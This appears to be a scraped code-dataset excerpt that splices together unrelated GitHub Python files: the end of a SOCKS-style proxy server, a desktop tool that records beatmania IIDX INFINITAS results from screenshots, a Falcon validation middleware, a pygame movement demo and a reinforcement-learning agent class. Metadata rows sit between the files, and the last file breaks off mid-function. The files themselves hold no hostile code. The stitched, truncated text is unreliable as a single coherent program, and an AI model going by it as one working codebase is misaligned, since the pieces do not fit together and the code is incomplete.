SERVER_CERT = ECC(key_len=32)
SERVER_CERT.save(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'cert.pem'))
servers = ['hxs://0.0.0.0:9000']
forward = []
if os.path.exists(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config.json')):
global USER_PASS
d = json.loads(open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config.json')).read())
USER_PASS = d['users']
servers = d['servers']
forward = d.get('forward', [])
for s in servers:
logging.info('starting server: %s' % s)
ssserver = HXSocksServer(s, forward, HXSocksHandler)
threading.Thread(target=ssserver.serve_forever).start()
if __name__ == '__main__':
try:
main()
except socket.error as e:
logging.error(e)
except KeyboardInterrupt:
sys.exit(0)
| hadidonk/hxsocks | hxsserver.py | hxsserver.py | py | 23,258 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "gevent.monkey.patch_all",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "gevent.monkey",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "gevent.version_info",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.... |
23563814386 | import keyboard
import time
import PySimpleGUI as sg
from threading import Thread,Event
from queue import Queue
from os.path import join,exists,pardir
import webbrowser
import logging
from urllib import request
from urllib.parse import quote
from setting import Setting
setting = Setting()
if setting.manage:
logging_level = logging.DEBUG
else:
logging_level = logging.WARNING
logging.basicConfig(
level=logging_level,
filename='log.txt',
filemode='w',
format='%(asctime)s - %(name)s %(levelname)-7s %(message)s'
)
logger = logging.getLogger()
logger.debug('loaded main.py')
logger.debug('mode: manage')
from version import version
import gui.main as gui
from gui.setting import open_setting
from gui.export import open_export
from gui.general import get_imagevalue
from define import define
from resources import resource,play_sound_result,check_latest
from screenshot import Screenshot,open_screenimage
from recog import recog
from raw_image import save_raw
from storage import StorageAccessor
from record import NotebookRecent,NotebookMusic,rename_allfiles
from graph import create_graphimage,save_graphimage
from result import result_save,result_savefiltered,get_resultimage,get_filteredimage
from filter import filter as filter_result
from playdata import Recent
from windows import find_window,get_rect,openfolder_results,openfolder_filtereds,openfolder_graphs
recent_maxcount = 100
thread_time_wait_nonactive = 1
thread_time_wait_loading = 30
thread_time_normal = 0.3
thread_time_result = 0.12
upload_confirm_message = [
'曲名の誤認識を通報しますか?',
'リザルトから曲名を切り取った画像をクラウドにアップロードします。'
]
windowtitle = 'beatmania IIDX INFINITAS'
exename = 'bm2dx.exe'
latest_url = 'https://github.com/kaktuswald/inf-notebook/releases/latest'
tweet_url = 'https://twitter.com/intent/tweet'
tweet_template_music = '&&music&&[&&play_mode&&&&D&&]&&update&&&&option&&'
tweet_template_hashtag = '#IIDX #infinitas573 #infnotebook'
class ThreadMain(Thread):
handle = 0
active = False
waiting = False
confirmed_result = False
confirmed_savable = False
processed_result = False
screen_latest = None
def __init__(self, event_close, queues):
self.event_close = event_close
self.queues = queues
Thread.__init__(self)
self.start()
def run(self):
self.sleep_time = thread_time_wait_nonactive
self.queues['log'].put('start thread')
while not self.event_close.wait(timeout=self.sleep_time):
self.routine()
def routine(self):
if self.handle == 0:
self.handle = find_window(windowtitle, exename)
if self.handle == 0:
return
self.queues['log'].put(f'infinitas find')
self.active = False
screenshot.xy = None
rect = get_rect(self.handle)
width = rect.right - rect.left
height = rect.bottom - rect.top
if rect is None or not width or not height:
self.queues['log'].put(f'infinitas lost')
self.sleep_time = thread_time_wait_nonactive
self.handle = 0
self.active = False
screenshot.xy = None
return
if width != define.width or height != define.height:
if self.active:
self.queues['log'].put(f'infinitas deactivate')
self.sleep_time = thread_time_wait_nonactive
self.active = False
screenshot.xy = None
return
if not self.active:
self.active = True
self.waiting = False
self.queues['log'].put(f'infinitas activate')
self.sleep_time = thread_time_normal
screenshot.xy = (rect.left, rect.top)
screen = screenshot.get_screen()
if screen != self.screen_latest:
self.screen_latest = screen
if screen == 'loading':
if not self.waiting:
self.confirmed_result = False
self.confirmed_savable = False
self.processed_result = False
self.waiting = True
self.queues['log'].put('find loading: start waiting')
self.sleep_time = thread_time_wait_loading
return
if self.waiting:
self.waiting = False
self.queues['log'].put('lost loading: end waiting')
self.sleep_time = thread_time_normal
shotted = False
if display_screenshot_enable:
screenshot.shot()
shotted = True
self.queues['display_image'].put(screenshot.get_image())
if screen != 'result':
self.confirmed_result = False
self.confirmed_savable = False
self.processed_result = False
return
if not self.confirmed_result:
self.confirmed_result = True
self.sleep_time = thread_time_result
if self.processed_result:
return
if not shotted:
screenshot.shot()
if not recog.get_is_savable(screenshot.np_value):
return
if not self.confirmed_savable:
self.confirmed_savable = True
self.find_time = time.time()
return
if time.time() - self.find_time <= thread_time_normal*2-0.1:
return
resultscreen = screenshot.get_resultscreen()
self.processed = True
self.queues['result_screen'].put(resultscreen)
self.sleep_time = thread_time_normal
self.processed_result = True
class Selection():
def __init__(self, play_mode, difficulty, music, notebook):
self.play_mode = play_mode
self.difficulty = difficulty
self.music = music
self.notebook = notebook
self.recent = False
self.filtered = False
self.graph = False
self.timestamp = None
def selection_recent(self, timestamp):
self.recent = True
self.filtered = False
self.graph = False
self.timestamp = timestamp
def selection_graph(self):
if self.music is None:
return False
self.recent = False
self.filtered = False
self.graph = True
self.timestamp = None
return True
def selection_timestamp(self, timestamp):
self.recent = False
self.filtered = False
self.graph = False
self.timestamp = timestamp
def selection_filtered(self):
self.filtered = True
self.graph = False
def get_targetrecordlist(self):
return self.notebook.get_recordlist(self.play_mode, self.difficulty)
def result_process(screen):
"""リザルトを記録するときの処理をする
Args:
screen (Screen): screen.py
"""
result = recog.get_result(screen)
if result is None:
return
resultimage = screen.original
if setting.data_collection or window['force_upload'].get():
if storage.upload_collection(result, resultimage, window['force_upload'].get()):
timestamps_uploaded.append(result.timestamp)
if setting.newrecord_only and not result.has_new_record():
return
if setting.play_sound:
play_sound_result()
images_result[result.timestamp] = resultimage
saved = False
if setting.autosave:
save_result(result, resultimage)
saved = True
filtered = False
if setting.autosave_filtered:
save_filtered(
resultimage,
result.timestamp,
result.informations.music,
result.play_side,
result.rival,
result.details.graphtarget == 'rival'
)
filtered = True
notebook_recent.append(result, saved, filtered)
notebook_recent.save()
music = result.informations.music
if music is not None:
if music in notebooks_music.keys():
notebook = notebooks_music[music]
else:
notebook = NotebookMusic(music) if music is not None else None
notebooks_music[music] = notebook
if not result.dead or result.has_new_record():
notebook.insert(result)
notebook.save()
if not result.dead or result.has_new_record():
recent.insert(result)
insert_results(result)
def save_result(result, image):
if result.timestamp in timestamps_saved:
return
ret = None
try:
music = result.informations.music
ret = result_save(image, music, result.timestamp, setting.imagesave_path, setting.savefilemusicname_right)
except Exception as ex:
logger.exception(ex)
gui.error_message(u'保存の失敗', u'リザルトの保存に失敗しました。', ex)
return
if ret:
timestamps_saved.append(result.timestamp)
log_debug(f'save result: {ret}')
def save_filtered(resultimage, timestamp, music, play_side, loveletter, rivalname):
"""リザルト画像にぼかしを入れて保存する
Args:
image (Image): 対象の画像(PIL)
timestamp (str): リザルトのタイムスタンプ
music (str): 曲名
play_side (str): 1P or 2P
loveletter (bool): ライバル挑戦状の有無
rivalname (bool): グラフターゲットのライバル名の有無
Returns:
Image: ぼかしを入れた画像
"""
filteredimage = filter_result(resultimage, play_side, loveletter, rivalname)
ret = None
try:
ret = result_savefiltered(filteredimage, music, timestamp, setting.imagesave_path, setting.savefilemusicname_right)
except Exception as ex:
logger.exception(ex)
gui.error_message(u'保存の失敗', u'リザルトの保存に失敗しました。', ex)
return
if ret:
images_filtered[timestamp] = filteredimage
log_debug(f'save filtered result: {ret}')
def insert_recentnotebook_results():
for timestamp in notebook_recent.timestamps:
target = notebook_recent.get_result(timestamp)
playmode = target['play_mode']
difficulty = target['difficulty']
list_results.insert(0, [
'☑' if target['saved'] else '',
'☑' if target['filtered'] else '',
timestamp,
target['music'] if target['music'] is not None else '??????',
f'{playmode}{difficulty[0]}' if playmode is not None and difficulty is not None else '???',
'☑' if target['clear_type_new'] else '',
'☑' if target['dj_level_new'] else '',
'☑' if target['score_new'] else '',
'☑' if target['miss_count_new'] else ''
])
refresh_table()
def insert_results(result):
global table_selected_rows
results_today[result.timestamp] = result
play_mode = result.informations.play_mode
difficulty = result.informations.difficulty
music = result.informations.music
list_results.insert(0, [
'☑' if result.timestamp in timestamps_saved else '',
'☑' if result.timestamp in images_filtered.keys() else '',
result.timestamp,
music if music is not None else '??????',
f'{play_mode}{difficulty[0]}' if play_mode is not None and difficulty is not None else '???',
'☑' if result.details.clear_type.new else '',
'☑' if result.details.dj_level.new else '',
'☑' if result.details.score.new else '',
'☑' if result.details.miss_count.new else ''
])
while len(list_results) > recent_maxcount:
del list_results[-1]
table_selected_rows = [v + 1 for v in table_selected_rows]
refresh_table(setting.display_result)
def update_resultflag(row_index, saved=False, filtered=False):
if saved:
list_results[row_index][0] = '☑'
if filtered:
list_results[row_index][1] = '☑'
def refresh_table(select_newest=False):
if select_newest:
window['table_results'].update(values=list_results, select_rows=[0])
else:
window['table_results'].update(values=list_results, select_rows=table_selected_rows)
def clear_tableselection():
table_selected_rows = []
window['table_results'].update(select_rows=table_selected_rows)
def active_screenshot():
if not screenshot.shot():
return
image = screenshot.get_image()
if image is not None:
filepath = save_raw(image)
log_debug(f'save screen: {filepath}')
gui.display_image(get_imagevalue(image))
window['screenshot_filepath'].update(join(pardir, filepath))
def log_debug(message):
logger.debug(message)
if setting.manage:
print(message)
def get_latest_version():
with request.urlopen(latest_url) as response:
url = response.geturl()
version = url.split('/')[-1]
print(f'released latest version: {version}')
if version[0] == 'v':
return version.removeprefix('v')
else:
return None
def check_resource():
informations_filename = f'{define.informations_resourcename}.res'
if check_latest(storage, informations_filename):
resource.load_resource_informations()
details_filename = f'{define.details_resourcename}.res'
if check_latest(storage, details_filename):
resource.load_resource_details()
musictable_filename = f'{define.musictable_resourcename}.res'
if check_latest(storage, musictable_filename):
resource.load_resource_musictable()
gui.update_musictable()
def select_result_recent():
if len(table_selected_rows) == 0:
return None
window['music_candidates'].update(set_to_index=[])
if len(table_selected_rows) != 1:
return None
timestamp = list_results[table_selected_rows[0]][2]
target = notebook_recent.get_result(timestamp)
if target['music'] is not None:
if target['music'] in notebooks_music.keys():
notebook = notebooks_music[target['music']]
else:
notebook = NotebookMusic(target['music'])
notebooks_music[target['music']] = notebook
else:
notebook = None
ret = Selection(
target['play_mode'],
target['difficulty'],
target['music'],
notebook
)
ret.selection_recent(timestamp)
if timestamp in results_today.keys():
display_today(ret)
else:
display_history(ret)
if ret.notebook is not None:
if ret.play_mode == 'SP':
window['play_mode_sp'].update(True)
if ret.play_mode == 'DP':
window['play_mode_dp'].update(True)
window['difficulty'].update(ret.difficulty)
window['search_music'].update(target['music'])
targetrecordlist = ret.get_targetrecordlist()
gui.display_record(targetrecordlist)
gui.display_historyresult(targetrecordlist, timestamp)
else:
gui.display_record(None)
return ret
def select_music_search():
if len(values['music_candidates']) != 1:
return None
play_mode = None
if values['play_mode_sp']:
play_mode = 'SP'
if values['play_mode_dp']:
play_mode = 'DP'
if play_mode is None:
return None
difficulty = values['difficulty']
if difficulty == '':
return None
music = values['music_candidates'][0]
clear_tableselection()
if music in notebooks_music.keys():
notebook = notebooks_music[music]
else:
notebook = NotebookMusic(music)
notebooks_music[music] = notebook
targetrecordlist = notebook.get_recordlist(play_mode, difficulty)
if targetrecordlist is None:
gui.display_record(None)
gui.display_image(None)
return None
ret = Selection(play_mode, difficulty, music, notebook)
gui.display_record(targetrecordlist)
create_graph(ret, targetrecordlist)
return ret
def select_history():
if len(values['history']) != 1:
return
clear_tableselection()
timestamp = values['history'][0]
selection.selection_timestamp(timestamp)
gui.display_historyresult(selection.get_targetrecordlist(), timestamp)
if timestamp in results_today.keys():
display_today(selection)
else:
display_history(selection)
def load_resultimages(timestamp, music, recent=False):
image_result = get_resultimage(music, timestamp, setting.imagesave_path)
images_result[timestamp] = image_result
if image_result is not None:
timestamps_saved.append(timestamp)
image_filtered = get_filteredimage(music, timestamp, setting.imagesave_path)
if not recent or image_result is None or image_filtered is not None:
images_filtered[timestamp] = image_filtered
def display_today(selection):
if selection.timestamp in imagevalues_result.keys():
resultimage = imagevalues_result[selection.timestamp]
else:
resultimage = get_imagevalue(images_result[selection.timestamp])
imagevalues_result[selection.timestamp] = resultimage
gui.display_image(resultimage, result=True)
def display_history(selection):
if not selection.timestamp in images_result.keys():
load_resultimages(selection.timestamp, selection.music, selection.timestamp in notebook_recent.timestamps)
if selection.timestamp in imagevalues_result.keys():
imagevalue_result = imagevalues_result[selection.timestamp]
else:
imagevalue_result = get_imagevalue(images_result[selection.timestamp]) if selection.timestamp in images_result.keys() and images_result[selection.timestamp] is not None else None
imagevalues_result[selection.timestamp] = imagevalue_result
if imagevalue_result is not None:
gui.display_image(imagevalue_result, result=True)
else:
if selection.timestamp in imagevalues_filtered.keys():
imagevalue_filtered = imagevalues_filtered[selection.timestamp]
else:
imagevalue_filtered = get_imagevalue(images_filtered[selection.timestamp]) if selection.timestamp in images_filtered.keys() and images_filtered[selection.timestamp] is not None else None
imagevalues_filtered[selection.timestamp] = imagevalue_filtered
gui.display_image(imagevalue_filtered, result=True)
if imagevalue_filtered is not None:
selection.selection_filtered()
def save():
if selection.recent:
for row_index in table_selected_rows:
timestamp = list_results[row_index][2]
if timestamp in results_today.keys() and not timestamp in timestamps_saved:
save_result(results_today[timestamp], images_result[timestamp])
notebook_recent.get_result(timestamp)['saved'] = True
update_resultflag(row_index, saved=True)
notebook_recent.save()
refresh_table()
if selection.graph:
save_graphimage(selection.music, images_graph[selection.music], setting.imagesave_path, setting.savefilemusicname_right)
def filter():
"""ライバル欄にぼかしを入れて、ぼかし画像を表示する
最近のリザルトから選択している場合:
選択しているすべてのリザルトにぼかし処理を実行する。
ただし今日のリザルトでない場合は、リザルト画像がファイル保存されている場合のみ、処理が可能。
曲検索から選択している場合:
それが最近のリザルトに含まれている場合は、ぼかし処理ができない(tableのインデックスがわからないため)。
ぼかし画像の有無の確認のみ行い、画像がある場合はそれを表示する。
"""
if selection.recent:
updated = False
for row_index in table_selected_rows:
timestamp = list_results[row_index][2]
target = notebook_recent.get_result(timestamp)
if not timestamp in images_result.keys():
load_resultimages(timestamp, target['music'], True)
if images_result[timestamp] is not None and not timestamp in images_filtered.keys():
save_filtered(
images_result[timestamp],
timestamp,
target['music'],
target['play_side'],
target['has_loveletter'],
target['has_graphtargetname']
)
target['filtered'] = True
update_resultflag(row_index, filtered=True)
updated = True
if updated:
notebook_recent.save()
refresh_table()
else:
if not selection.timestamp in images_result.keys() and not selection.timestamp in notebook_recent.timestamps:
load_resultimages(selection.timestamp, selection.music)
if selection.timestamp in imagevalues_filtered.keys():
imagevalue = imagevalues_filtered[selection.timestamp]
else:
filteredimage = images_filtered[selection.timestamp] if selection.timestamp in images_filtered.keys() else None
imagevalue = get_imagevalue(filteredimage) if filteredimage is not None else None
if imagevalue is not None:
imagevalues_filtered[selection.timestamp] = imagevalue
if imagevalue is not None:
gui.display_image(imagevalue, result=True)
selection.selection_filtered()
def upload():
if not selection.recent:
return
if not gui.question('確認', upload_confirm_message):
return
for row_index in table_selected_rows:
timestamp = list_results[row_index][2]
if timestamp in results_today.keys() and not timestamp in timestamps_uploaded:
storage.upload_collection(results_today[timestamp], images_result[timestamp], True)
timestamps_uploaded.append(timestamp)
def open_folder_results():
ret = openfolder_results(setting.imagesave_path)
if ret is not None:
logger.exception(ret)
gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)
def open_folder_filtereds():
ret = openfolder_filtereds(setting.imagesave_path)
if ret is not None:
logger.exception(ret)
gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)
def open_folder_graphs():
ret = openfolder_graphs(setting.imagesave_path)
if ret is not None:
logger.exception(ret)
gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)
def tweet():
if len(values['table_results']) > 0:
musics_text = []
for index in reversed(values['table_results']):
result = notebook_recent.get_result(list_results[index][2])
music = result['music']
music = music if music is not None else '??????'
text = tweet_template_music
text = text.replace('&&play_mode&&', result['play_mode'])
text = text.replace('&&D&&', result['difficulty'][0])
text = text.replace('&&music&&', music)
if result['update_clear_type'] is not None or result['update_dj_level'] is not None:
text = text.replace('&&update&&', ' '.join(v for v in [result['update_clear_type'], result['update_dj_level']] if v is not None))
else:
if result['update_score'] is not None:
text = text.replace('&&update&&', f"自己ベスト+{result['update_score']}")
else:
if result['update_miss_count'] is not None:
text = text.replace('&&update&&', f"ミスカウント{result['update_miss_count']}")
else:
text = text.replace('&&update&&', '')
if result['option'] is not None:
if result['option'] == '':
text = text.replace('&&option&&', '(正規)')
else:
text = text.replace('&&option&&', f"({result['option']})")
else:
text = text.replace('&&option&&', '')
musics_text.append(text)
music_text = '\n'.join(musics_text)
else:
if len(values['music_candidates']) == 1:
music_text = tweet_template_music
music_text = music_text.replace('&&play_mode&&', selection.play_mode)
if selection.music is not None:
music_text = music_text.replace('&&music&&', selection.music)
else:
music_text = music_text.replace('&&music&&', '?????')
music_text = music_text.replace('&&D&&', selection.difficulty[0])
music_text = music_text.replace('&&update&&', '')
music_text = music_text.replace('&&option&&', '')
else:
music_text = ''
text = quote('\n'.join((music_text, tweet_template_hashtag)))
url = f'{tweet_url}?text={text}'
webbrowser.open(url)
def delete_record():
if selection is None:
return
if selection.music in notebooks_music.keys():
del notebooks_music[selection.music]
selection.notebook.delete()
gui.search_music_candidates()
gui.display_record(None)
gui.display_image(None)
def delete_targetrecord():
if selection is None:
return
if selection.timestamp is None:
return
selection.notebook.delete_history(
selection.play_mode,
selection.difficulty,
selection.timestamp
)
gui.display_record(selection.get_targetrecordlist())
gui.display_image(None)
def create_graph(selection, targetrecord):
graphimage = create_graphimage(selection.play_mode, selection.difficulty, selection.music, targetrecord)
if graphimage is None:
return
images_graph[selection.music] = graphimage
imagevalue = get_imagevalue(graphimage)
gui.display_image(imagevalue, graph=True)
selection.selection_graph()
def rename_all_musicnotebooks():
if resource.informations is None:
return
rename_allfiles(resource.musictable['musics'].keys())
if __name__ == '__main__':
keyboard.add_hotkey('alt+F10', active_screenshot)
window = gui.generate_window(setting, version)
display_screenshot_enable = False
screenshot = Screenshot()
notebook_recent = NotebookRecent(recent_maxcount)
notebooks_music = {}
results_today = {}
timestamps_saved = []
timestamps_uploaded = []
images_result = {}
images_filtered = {}
imagevalues_result = {}
imagevalues_filtered = {}
images_graph = {}
selection = None
recent = Recent()
list_results = []
table_selected_rows = []
queue_log = Queue()
queue_display_image = Queue()
queue_result_screen = Queue()
storage = StorageAccessor()
event_close = Event()
thread = ThreadMain(
event_close,
queues = {
'log': queue_log,
'display_image': queue_display_image,
'result_screen': queue_result_screen
}
)
music_search_time = None
if not setting.has_key('data_collection'):
setting.data_collection = gui.collection_request('resources/annotation.png')
setting.save()
if setting.data_collection:
window['button_upload'].update(visible=True)
if version != '0.0.0.0' and get_latest_version() != version:
gui.find_latest_version(latest_url)
if not setting.ignore_download:
Thread(target=check_resource).start()
# version0.7.0.1以前の不具合対応のため
rename_all_musicnotebooks()
insert_recentnotebook_results()
while True:
event, values = window.read(timeout=50, timeout_key='timeout')
try:
if event in (sg.WIN_CLOSED, sg.WINDOW_CLOSE_ATTEMPTED_EVENT):
if not thread is None:
event_close.set()
thread.join()
log_debug(f'end')
break
if event == 'check_display_screenshot':
display_screenshot_enable = values['check_display_screenshot']
if event == 'check_display_result':
setting.display_result = values['check_display_result']
if event == 'check_newrecord_only':
setting.newrecord_only = values['check_newrecord_only']
if event == 'check_autosave':
setting.autosave = values['check_autosave']
if event == 'check_autosave_filtered':
setting.autosave_filtered = values['check_autosave_filtered']
if event == 'check_display_music':
setting.display_music = values['check_display_music']
gui.switch_table(setting.display_music)
if event == 'check_play_sound':
setting.play_sound = values['check_play_sound']
if event == 'check_savefilemusicname_right':
setting.savefilemusicname_right = values['check_savefilemusicname_right']
if event == 'text_file_path':
if exists(values['text_file_path']):
screen = open_screenimage(values['text_file_path'])
gui.display_image(get_imagevalue(screen.original))
if recog.get_is_savable(screen.np_value):
result_process(screen)
if event == 'button_setting':
open_setting(setting)
window['button_upload'].update(visible=setting.data_collection)
if event == 'button_save':
save()
if event == 'button_filter':
filter()
if event == 'button_open_folder_results':
open_folder_results()
if event == 'button_open_folder_filtereds':
open_folder_filtereds()
if event == 'button_open_folder_graphs':
open_folder_graphs()
if event == 'button_tweet':
tweet()
if event == 'button_export':
open_export(recent)
if event == 'button_upload':
upload()
if event == 'table_results':
if values['table_results'] != table_selected_rows:
table_selected_rows = values['table_results']
selection_result = select_result_recent()
if selection_result is not None:
selection = selection_result
if selection.music is not None:
window['music_candidates'].update([selection.music], set_to_index=[0])
else:
window['music_candidates'].update(set_to_index=[])
if event == 'button_graph':
if selection is not None and selection.music is not None:
create_graph(selection, selection.get_targetrecordlist())
if event == 'category_versions':
gui.search_music_candidates()
if event == 'search_music':
music_search_time = time.time() + 1
if event in ['play_mode_sp', 'play_mode_dp', 'difficulty', 'music_candidates']:
selection_result = select_music_search()
if selection_result is not None:
selection = selection_result
if event == '選択した曲の記録を削除する':
delete_record()
selection = None
if event == 'history':
select_history()
if event == '選択したリザルトの記録を削除する':
delete_targetrecord()
if event == 'button_best_switch':
gui.switch_best_display()
if event == 'timeout':
if not window['positioned'].visible and thread.handle:
window['positioned'].update(visible=True)
if window['positioned'].visible and not thread.handle:
window['positioned'].update(visible=False)
if not window['captureenable'].visible and screenshot.xy:
window['captureenable'].update(visible=True)
if window['captureenable'].visible and not screenshot.xy:
window['captureenable'].update(visible=False)
if music_search_time is not None and time.time() > music_search_time:
music_search_time = None
gui.search_music_candidates()
if not queue_log.empty():
log_debug(queue_log.get_nowait())
if not queue_display_image.empty():
clear_tableselection()
window['music_candidates'].update(set_to_index=[])
selection = None
gui.display_image(get_imagevalue(queue_display_image.get_nowait()))
if not queue_result_screen.empty():
result_process(queue_result_screen.get_nowait())
except Exception as ex:
log_debug(ex)
window.close()
del screenshot
| kaktuswald/inf-notebook | main.pyw | main.pyw | pyw | 34,382 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "setting.Setting",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "setting.manage",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "logging.DEBUG",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "logging.WARNIN... |
32402600311 | import json
from falcon.status_codes import HTTP_404, HTTP_400
from marshmallow import ValidationError
from utils.HTTPError import HTTPError
class Serializer:
"""
This middleware gives us a possibility to validate data from request body.
It also allows to set a separate schema (validator) for every HTTP method.
At the end, it sets serializer data in context so we can read the data in API
endpoint (if needed). If the data is not correct, API returns HTTP 400 error
with validation message returned by marshmallow.
"""
def process_resource(self, req, _resp, resource, _params):
body = json.load(req.bounded_stream)
try:
serializer = resource.serializers[req.method.lower()]
except (AttributeError, IndexError, KeyError):
raise HTTPError(status=HTTP_404)
else:
try:
req.context["serializer"] = serializer().load(data=body)
except ValidationError as err:
raise HTTPError(error="Bad Request", status=HTTP_400, field_errors=err.messages)
| NomanGul/kanda-fullstack-test | server/middlewares/serializer.py | serializer.py | py | 1,084 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "utils.HTTPError.HTTPError",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "falcon.status_codes.HTTP_404",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mars... |
12829799852 | import pygame as pg
WIDTH = 700
HEIGHT = 500
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255,0)
BLUE = (0, 0, 255)
up_key = False
down_key = False
left_key = False
right_key = False
CAR_WIDTH = 30
CAR_HEIGHT = 30
car_x = WIDTH / 2
car_y = HEIGHT / 2
car_x_vel = 0
car_y_vel = 0
max_vel = 10
friction = 0.9
power = 4
pg.init()
pg.display.set_caption('Platformer 1')
screen = pg.display.set_mode([WIDTH, HEIGHT])
running = True
while running == True:
for e in pg.event.get():
if e.type == pg.QUIT:
running = False
elif e.type == pg.KEYDOWN:
if e.key == pg.K_LEFT:
left_key = True
elif e.key == pg.K_RIGHT:
right_key = True
elif e.key == pg.K_DOWN:
down_key = True
elif e.key == pg.K_UP:
up_key = True
elif e.type == pg.KEYUP:
if e.key == pg.K_LEFT:
left_key = False
elif e.key == pg.K_RIGHT:
right_key = False
elif e.key == pg.K_DOWN:
down_key = False
elif e.key == pg.K_UP:
up_key = False
# print(up_key, '\t', down_key, '\t', left_key, '\t', right_key)
# After processing events:
# Handle x velocity
if left_key and not right_key:
car_x_vel -= power
elif not left_key and right_key:
car_x_vel += power
else:
car_x_vel = car_x_vel * friction
# Limit x velocity
if car_x_vel > max_vel:
car_x_vel = max_vel
elif car_x_vel < -max_vel:
car_x_vel = -max_vel
# Handle y velocity
if up_key and not down_key:
car_y_vel -= power
elif not up_key and down_key:
car_y_vel += power
else:
car_y_vel = car_y_vel * friction
# Limit y velocity
if car_y_vel > max_vel:
car_y_vel = max_vel
elif car_y_vel < -max_vel:
car_y_vel = -max_vel
# Change position by velocity
car_x += car_x_vel
car_y += car_y_vel
# Warp car over x axis
if car_x + (CAR_WIDTH/2) < 0:
car_x = WIDTH - car_x
elif car_x - (CAR_WIDTH/2) > WIDTH:
car_x = car_x - WIDTH - CAR_WIDTH
# Warp car over y axis
if car_y + (CAR_HEIGHT/2) < 0:
car_y = HEIGHT - car_y
elif car_y - (CAR_HEIGHT/2) > HEIGHT:
car_y = car_y - HEIGHT - CAR_HEIGHT
# Render car
screen.fill(WHITE)
pg.draw.rect(screen, BLUE, (int(car_x-(CAR_WIDTH/2)), int(car_y-(CAR_HEIGHT/2)), CAR_WIDTH, CAR_HEIGHT))
pg.display.update()
pg.quit()
| oscarsangwin/pygame-platformer | car01.py | car01.py | py | 2,614 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.init",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "pygame.display.set_caption",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "pygame.display",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "pygame.dis... |
17381398214 | """
Implementation of the human and machine policies in the paper
"""
from copy import copy
import random
import numpy as np
import math
import torch
from collections import defaultdict
from environments.env import Environment, GridWorld
from networks.networks import ActorNet
class Agent:
"""
Agent superclass
"""
def __init__(self):
self.policy = {}
def update_obs(self, *args):
"""Add observations to the record"""
def update_policy(self, *args):
"""Update the action policy"""
def take_action(self, *args):
"""Return an action based on the policy"""
class MachineDriverAgent(Agent):
def __init__(self, n_state_features, n_actions, optimizer, setting=1, c_M=0., entropy_weight=0.01, batch_size=1):
"""Initialize network and hyperparameters"""
super(MachineDriverAgent, self).__init__()
# n_state_features[1] is the network input size
self.network = ActorNet(n_state_features[1], n_actions)
self.optimizer = optimizer(self.network.parameters())
self.entropy_weight_0 = entropy_weight
self.timestep = 0
self.control_cost = c_M
self.trainable = True
self.M_t = np.zeros(batch_size)
self.setting = setting
# n_state_features[0] is the number of state features
self.n_state_features = n_state_features[0]
def update_obs(self, *args):
"""Return input batch for training"""
pass
def update_policy(self, weighting, delta, log_pi, entropy, use_entropy=True):
"""
Implement train step
Parameters
----------
weighting: torch.LongTensor
For off-policy weighting = M_t * rho_t, for on-policy weighting = switch(s)
delta: torch.LongTensor
For off-policy delta = TD_error, for on-policy delta = v(s)
current_policy: Categorical
The current action policy distribution
action: int
The action taken
"""
if use_entropy:
self.timestep+=1
self.entropy_weight = self.entropy_weight_0/self.timestep
else:
self.entropy_weight = 0
# weighting and delta must have been computed with torch.no_grad()
policy_loss = weighting * delta * log_pi + self.entropy_weight*entropy
policy_loss = policy_loss.mean()
self.optimizer.zero_grad()
policy_loss.backward()
torch.nn.utils.clip_grad_norm_(self.network.parameters(), 1.)
self.optimizer.step()
def take_action(self, curr_state):
"""
Return an action given the current based on the policy
Parameters
----------
curr_state: list of strings
Current state vector
Returns
-------
action: int
The action to be taken
policy: Categorical
The action policy distribution given form the network
"""
# TODO: make machine worse than human+machine e.g. same feature value for road-grass
set_curr_state = curr_state
if self.setting == 2 or self.setting == 6:
set_curr_state = list(map(lambda x : 'road' if x=='grass' else x, curr_state ))
state_feature_vector = Environment.state2features(set_curr_state, self.n_state_features)
actions_logits = self.network(state_feature_vector)
# actions_logits[actions_logits!=actions_logits] = 0
valid_action_logits = actions_logits
# print("logits", actions_logits)
# # Never choose wall
# if len(curr_state) > 1:
# if curr_state[1] == 'wall':
# valid_action_logits = actions_logits[1:]
# elif curr_state[3] == 'wall':
# valid_action_logits = actions_logits[:2]
policy = torch.distributions.Categorical(logits=valid_action_logits)
valid_action_probs = policy.probs
if (policy.probs < 1e-5).any():
valid_action_probs = valid_action_probs.clamp(1e-5,1-1e-5)
valid_action_probs = valid_action_probs/valid_action_probs.sum()
if len(curr_state) > 1:
if curr_state[1] == 'wall':
valid_action_probs = valid_action_probs[1:].clamp(1e-5,1-1e-5)
valid_action_probs = valid_action_probs/valid_action_probs.sum()
valid_action_probs = torch.squeeze(torch.stack([torch.tensor(0),valid_action_probs[0], valid_action_probs[1]]))
elif curr_state[3] == 'wall':
valid_action_probs = valid_action_probs[:2].clamp(1e-5,1-1e-5)
valid_action_probs = valid_action_probs/valid_action_probs.sum()
valid_action_probs = torch.squeeze(torch.stack([valid_action_probs[0], valid_action_probs[1], torch.tensor(0)]))
# valid_action_probs = valid_action_probs.clamp(1e-5, 1.)
valid_policy = torch.distributions.Categorical(probs=valid_action_probs)
# print("a", valid_action_probs)
action = valid_policy.sample().item()
if len(curr_state) > 1:
if curr_state[1] == 'wall':
assert action != 0
elif curr_state[3] == 'wall':
assert action != 2
return action , valid_policy
# needed to pickle human
def dd_init():
